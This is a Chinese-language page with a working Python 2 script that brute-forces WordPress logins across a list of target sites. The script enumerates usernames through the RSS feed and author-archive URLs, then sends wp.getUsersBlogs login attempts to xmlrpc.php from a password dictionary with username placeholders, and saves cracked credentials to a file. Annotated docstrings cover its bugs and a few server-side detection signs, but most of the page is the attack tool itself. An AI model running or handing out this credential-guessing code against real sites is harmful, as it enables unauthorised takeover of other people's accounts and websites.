版本等待解决的问题:
1. 如果当前xmlrpc.php不可用,还是会继续爆破,不会终止爆破当前的URL
2. 如果网站超时,不会终止,会继续 for 循环跑完当前字典
3. 单线程问题,速度比较慢
4. 还没想到

爆破当前目录的test_url.txt里面的url,密码字典为pass.txt,
test_url.txt格式为:

http://www.baidu.com/
http://www.ansbase5.org

密码字典格式为:

~
%123
%456
%789
%111
%222
%333
%666
%888
%123456
123456
123654
%123654
123123
%123123
123456789
%123456789
qweasdzxc
%qweasdzxc
abcde123
%abcde123
%abcd

字典中的 % 为用户名变量(运行时替换为用户名),~ 表示密码与用户名相同。

#!/usr/bin/env python
#coding:utf-8
# __author__ = 'IversOn5'

import requests
import re
import threading



def get_author(url):
   """Collect candidate WordPress usernames for *url* (the recon step before the
   xmlrpc loop in ``main``).

   Two GETs are issued: ``url + "?feed=rss2"`` (author names taken from the
   ``<dc:creator>`` CDATA of the feed) and ``url + "?author=1"`` (the page
   ``<title>`` up to the first whitespace, or -- if that regex finds nothing --
   the ``author/<name>/`` segment of ``res1.url``).  Note that, unlike
   ``crack_xmlrpc``, no ``/`` is inserted before the query string.  From the
   server side these two requests are the observable signature of the
   enumeration: a ``?feed=rss2`` fetch immediately followed by ``?author=1``.

   Returns:
      A de-duplicated list of names (order not preserved, it goes through a
      set); ``["admin"]`` when both probes came back empty; ``False`` if any
      exception was raised (the exception is printed, not re-raised).

   NOTE(review): the header key is ``'UserAgent'``, not the standard
   ``'User-Agent'``; this value is therefore presumably sent as a nonstandard
   header while the library's default User-Agent goes out unchanged -- an
   identifiable fingerprint in access logs.  Verify against the HTTP library.

   Python 2 code (``except Exception, e`` / ``print`` statements): ``.content``
   is a byte string here, which is why the ``re`` patterns are plain str.
   """

   get_url0 = url + "?feed=rss2"
   get_url1 = url + "?author=1"
   headers = {
      'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
   }
   #print url
   try:
      # 3-second timeout on each probe; a slow host raises and the whole
      # function returns False rather than retrying.
      res0 = requests.get(get_url0,headers=headers,timeout=3)
      res1 = requests.get(get_url1,headers=headers,timeout=3)
      html0 = res0.content
      html1 = res1.content
      # Feed authors: every <dc:creator><![CDATA[...]]></dc:creator> block.
      s0 = re.findall('<dc:creator><\!\[CDATA\[(.*?)\]\]><\/dc:creator>',html0)
      # Author archive: first whitespace-delimited word of the <title>.
      s1 = re.findall('<title>(.*?)\s',html1)
      if len(s1) == 0:
         # print "null"
         # print res.url
         # Fallback: name embedded in the response URL, e.g. ".../author/<name>/".
         s1 = re.findall('author/(.*?)/', res1.url)
      s = s0 + s1 
      #print "The Username maybs1e:",s
      if not s:
         # Nothing found by either probe: fall back to the default account name.
         s.append("admin")
      u = list(set(s))
      #print u
      return u
      #for i in list(set(s)):
         #print i

   except Exception, e:
      # Any network/parsing error is swallowed here and signalled to the
      # caller as False (main() then skips this URL).
      print e
      return False



def crack_xmlrpc(username, password, url):
   """Send one ``wp.getUsersBlogs`` XML-RPC login attempt to ``<url>/xmlrpc.php``.

   Args:
      username: candidate account name from ``get_author``.  If it contains a
         comma its last character is dropped (the trailing-comma artefact of
         the ``<title>`` regex).
      password: one dictionary line.  Two placeholders are expanded: a ``%``
         anywhere in the line makes the password ``username + line[1:]``
         (the first character is removed regardless of where ``%`` sits);
         a ``~`` makes the password equal to the username.
      url: site root; ``/xmlrpc.php`` is appended with or without the
         separating slash as needed.

   Returns:
      ``"success"`` when the response body contains ``isAdmin`` (the attempt
      is also appended to ``success_wp_test.txt`` as ``url -- user  pass``);
      ``"failed"`` only when ``counter`` reaches 3 inside the except branch;
      ``None`` in every other case (405 fault, ``faultCode``, any other body,
      or a swallowed exception below the threshold).

   NOTE: ``counter`` is declared global but reset to ``0`` on every call, so
   after an exception it is at most ``1`` and the ``>= 3`` branch below is
   never taken -- this is the open issue listed at the top of the page (a
   dead or timing-out host keeps being tried for the whole dictionary).

   Detection note: each call is one POST to ``xmlrpc.php`` carrying a
   ``wp.getUsersBlogs`` methodCall with a 3-second timeout; a burst of such
   POSTs from one client, mostly answered with a ``faultCode``, is the
   observable pattern on the server side.
   """
   global counter
   counter = 0
   if not url.endswith('/'):
      crack_url = url + "/xmlrpc.php"
   else:
      crack_url = url + "xmlrpc.php"
   if ',' in username:
      # Strip the last character (assumed to be the trailing comma).
      username = username[0:-1]

   if '%' in password:
      # Placeholder line: username followed by the remainder of the line.
      password = username+password[1:]
   if '~' in password:
      # Placeholder line: password identical to the username.
      password = username
   print username+"  "+password
   # Credentials are spliced into the XML body unescaped; names containing
   # XML-special characters (<, &) would produce a malformed document.
   post = '''
      <?xml version="1.0" encoding="iso-8859-1"?>
      <methodCall>
      <methodName>wp.getUsersBlogs</methodName>
      <params>
          <param><value>''' + username + '''</value></param>
          <param><value>''' + password + '''</value></param>
      </params>
      </methodCall>'''
   headers = {
      'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
      'Referer': crack_url
   }
   try:
      res = requests.post(url=crack_url, data=post, headers=headers, timeout=3).content
      #print "ok"
   except Exception, e:
      # See the NOTE in the docstring: counter was just zeroed, so this
      # threshold cannot be reached within a single call.
      counter = counter + 1
      if counter >=3:
         return "failed"
      print "error", e

   else:
      # Response classification is substring-based on the raw body.
      if '<int>405</int>' in res:
         # Server answered with fault 405: XML-RPC is disabled on this site.
         print "XML-RPC has been disabled. Please use the wp-admin.php"
      elif "faultCode" in res:
         # Any other fault is treated as a rejected login.
         pass
         #print "The password is not:", password
      elif "isAdmin" in res:
         # A blog listing came back, which only happens after authentication.
         print "\nThe password is ", password
         with open('success_wp_test.txt','a') as suc:
            suc.write(url+" -- "+username+"  "+password+"\n")
         return "success"



def main(password):
   """Run the username-enumeration + xmlrpc loop over the module-level ``urls``.

   Args:
      password: list of dictionary lines (already stripped by the caller).

   Relies on the global ``urls`` that is only assigned in the
   ``__main__`` block below; calling ``main`` from elsewhere without defining
   it raises ``NameError``.

   Loop structure, per URL:
      * ``get_author`` returning a falsy value skips the URL entirely.
      * usernames shorter than 2 characters are skipped.
      * ``"success"`` from ``crack_xmlrpc`` ends the password loop for that
        username only; the remaining usernames are still tried.
      * ``"failed"`` sets ``break_flag`` so the remaining usernames for this
        URL are skipped (checked at the top of the next iteration).
      * ``None`` (error below the threshold, 405, fault) just continues.
   """

   for url in urls:
      print "Checking "+url+" username"
      username = get_author(url)
      if username:
         break_flag = False
         for u in username:
            u = u.strip()
            if break_flag:
               break
            if len(u) >= 2:# only try usernames of 2+ characters, to avoid hitting an empty account
               for p in password:
                  single = crack_xmlrpc(u,p,url)
                  if single == "success":
                     break
                  if single == "failed":
                     break_flag = True
                     break




if __name__ == '__main__':
   # Target list: one URL per line from 'test_urL.txt' (note the capital L,
   # which differs from the 'test_url.txt' named in the text above on
   # case-sensitive filesystems).  Any line containing "https" is dropped.
   # Neither file handle is closed explicitly.
   urls = []
   for i in open('test_urL.txt','r').readlines():
      if "https" not in i:
         urls.append(i.strip())
   print "loaded urls"
   # Dictionary: one entry per line, whitespace stripped; see the '%' / '~'
   # placeholder handling in crack_xmlrpc.
   passwordx = [i.strip() for i in open('pass.txt','r').readlines()]
   print "loaded passowrd"
   main(passwordx)
